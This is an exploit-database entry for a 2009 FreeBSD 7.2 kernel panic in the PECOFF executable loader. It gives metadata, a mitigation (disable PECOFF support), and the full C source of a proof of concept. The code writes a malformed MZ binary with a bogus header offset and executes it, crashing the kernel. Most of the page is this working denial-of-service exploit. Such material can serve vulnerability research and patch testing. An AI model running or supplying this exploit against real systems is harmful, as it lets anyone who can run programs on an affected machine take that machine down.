FreeBSD PECOFF Executable Loader Panic DoS

vendor:

PECOFF Executable Loader

by:

Shaun Colley

7,8

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: PECOFF Executable Loader

Affected Version From: FreeBSD 7.2-RELEASE

Affected Version To: FreeBSD 7.2-RELEASE

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: FreeBSD

2009

FreeBSD PECOFF Executable Loader Panic DoS

This code will panic the FreeBSD kernel due to a bug in the PECOFF executable loader code ('options PECOFF_SUPPORT' in kernel config or `kldload pecoff`). The panic seems to be caused in generic_bcopy due to a page fault, which may be exploitable. This exploit is only a DoS at the moment.

Mitigation:

Disable the PECOFF_SUPPORT option in the kernel configuration or unload the pecoff module.

Source

Exploit-DB raw data:

/* pecoff_panic.c
 *
 * by Shaun Colley, 20 July 2009
 *
 * this code will panic the freebsd kernel due to a bug in the PECOFF executable loader
 * code ('options PECOFF_SUPPORT' in kernel config or `kldload pecoff`)
 *
 * panic(9) is in vm_fault due to a page fault.  the panic seems to be caused in
 * generic_bcopy...probably hitting a guard page..maybe exploitable(??) but this is just
 * a DoS at the moment :)  (ugly code btw)
 *
 * tested on freebsd 7.2-RELEASE
 *
 * - shaun
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

int main() {
int i, fd;
system("rm -rf evilprog.exe; touch evilprog.exe");
fd = open("evilprog.exe", O_WRONLY);
char buf[0x3a+2+0x04+4000];
buf[0] = 'M';
buf[1] = 'Z';  /* magic */
for(i = 2; i<0x3c; i++) buf[i] = 'a';
buf[0x3c] = 0xee;
buf[0x3d] = 0xee;
buf[0x3e] = 0xee;
buf[0x3f] = 0xee;
for(i = 0x40; i<(0x40+4000); i++) buf[i] = 0x61;
write(fd, buf, 0x3a+2+0x04+4000);
close(fd);
system("chmod 700 evilprog.exe");
system("./evilprog.exe");  /* run the dodgy PECOFF binary */
}

// milw0rm.com [2009-07-20]